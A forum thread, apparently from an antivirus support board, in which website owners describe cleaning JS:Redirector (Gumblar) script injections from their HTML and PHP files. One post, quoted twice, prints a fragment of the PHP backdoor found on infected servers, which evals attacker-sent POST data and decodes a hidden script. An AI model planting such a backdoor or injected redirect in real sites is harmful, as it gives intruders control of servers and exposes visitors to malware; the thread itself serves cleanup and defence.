JS-Redirector-G [trj] warning

[azgirl]

I've done some experimenting and have found the simplest solution, at least for me.

First I looked on the server for infected files.  I use WS_FTP.  Clicked on a few files on the server, asked to "view" them (in Notepad).  Any infected ones trigger Avast.  Some files are infected, some are not.  No rhyme or reason as to which are or are not.

Then I did the same for the ones on my computer, "viewed" in WS_FTP.  I presume you can do these operations in other FTP programs; I haven't used any others.  I re-uploaded the ones that were not infected.

Later I found that it's easier to check with Avast by right-clicking in the directory on my computer, instead of having all those Notepad windows open!

Now comes the tricky part.  Do I go back to a "backup" file or try to repair the html?  My concern was that my 'backup' files would not have my very latest changes.

So here's what I'm doing:  I simply open the infected file in my editor (I use Komposer), go to the Source Code, find that line of code (search for unescape) and delete the entire 3 lines, <script to script>.  The code is in the same place every time, right at the end of the /head section.  Makes it easy to find over and over!

After I save, I double-check in the folder on my computer by right-clicking the file name to let Avast do its thing.  Clean!

This way, everything on my page is preserved and the baddie is gone.  It's time-consuming, boring, but well worth it.

I hope these details will help.

BTW, has anyone figured out where all this 'redirection' is supposed to take us?

[DavidR]

I don't believe it really matters where it takes you as one malicious site is much the same as the next and even if you knew where it went, you wouldn't know what the payload would be at that end.

[azgirl]

...you wouldn't know what the payload would be at that end.

YIKES!  Very true.  Hadn't thought about that.  Thanks.

[DavidR]

You're welcome.

[VoniBear]

File Name:                      hxxp://www.cybermedsites.com/
Malware name:                JS:Redirector-H [trj]
Malware type:                 Trojan Horse
VPS version:                    090430-0, 04/30/2009

I use a site called Cybermedsites.com to host my web site. Today, when I attempted to access my site via the administration page through Cybermedsites, Avast detected the above. I've already notified the owners of Cybermedsites, but am wondering if anyone can determine if it is a valid infection?

Also, I am able to access my own web site URL direct without Avast detecting anything. Does this mean it is safe for others to peruse my site, or should I be concerned.

[DavidR]

The site has been hacked (that URL you gave), there is a bunch of obfuscated javascript (on a single line) just before the opening Body tag, see image. I have modified the script, broken down the single line, to make it easier to see in the image.

[simplyme2]

I too received this warning this morning from the website myfamilykitchen.com.  It was redirecting to something called gumblar.cn?

Thanks

[CharleyO]

***

Welcome to the forums, simplyme2.   

Please read the reports at the below links :

http://www.UnmaskParasites.com/security-report/?page=myfamilykitchen.com

http://www.google.com/safebrowsing/diagnostic?site=myfamilykitchen.com


***

[itzhak]

Hi!

Cutting this

Code: [Select]

document.write(unescape('encrypted script tag').replace(random char sequences)
from files *.htm *.html is not enough if you use php.

I had to find php code which generated this script. In my case it was something like this:

Code: [Select]

if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('encrypted script tag($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);

AND 10 lines of code...



Avast doesn't consider files *.php with this script infected, I used UltraEdit for finding and cutting. (65 files *.html and 157 files *.php)

[DavidR]

Please exercise extreme care when posting code or avast could possibly detect it in these pages and alert, this is why I post images of the code.

I know you are using it as an example but avast could still alert.

[shahja]

Hi,

any luck on removing this type of virus from all hacked files with a script, as oppose to manually checking each file.

I have over 200 main folders, and each has many sub-folders under it. I need a script to remove this type of virus automatically. As if I had to manually do this one at a time it will take me over 2-3 months. Please advise. I have a copy of it on server and same exact on my local hard drive. Total it is over 10 gig of files. So an easier way will be some type of script/code to remove the virus.
Please reply to my yahoo email as well.
Thanks & Regards

Jigar
(shahja99@yahoo.com)

Hi!

Cutting this

Code: [Select]

document.write(unescape('encrypted script tag').replace(random char sequences)
from files *.htm *.html is not enough if you use php.

I had to find php code which generated this script. In my case it was something like this:

Code: [Select]

if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('encrypted script tag($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);

AND 10 lines of code...



Avast doesn't consider files *.php with this script infected, I used UltraEdit for finding and cutting. (65 files *.html and 157 files *.php)

[polonus]

Hi malware fighters,

You all can read about the gumblar redirects here:
http://forum.avast.com/index.php?topic=45296.0

polonus

[jonbey]

Hi, I have bee caught up in this drupal / gumblar mess too. Rolling the server back.
I have uploaded fresh files but worried that the database may not be clean. Was using an older version of drupal too. Hopefully a rollback, upgrade and password change (ftp and drupal) will do the trick.

 

[polonus]

Update - JS:Redirector-GB [Trj] returning here:
This is a suspicious page
Result for  2015-05-15 20:52:14 UTC
Website: htxp://aguasomos.org
Checked URL: htxp://aguasomos.org/index.php?id=6609&option=com_k2&task=user&view=itemlis ...
Trojans detected:
Object: http://aguasomos.org/index.php?id=6609&option=com_k2&task=user&view=itemlist
SHA1: 4235c3fe1201d0e1ff45aa72928c1cd0ba03ce79
Name: TrojWare.JS.Agent.jg
Bitdefender TrafficLight blocks site.
Outdated Joomla Found   Security Announcements   Joomla under 2.5.26 or 3.3.5
The threat is in "media/system/js/mootools.js" & in "media/system/js/caption.js"  (blacole)

IP badness history: https://www.virustotal.com/nl/ip-address/50.63.33.1/information/

polonus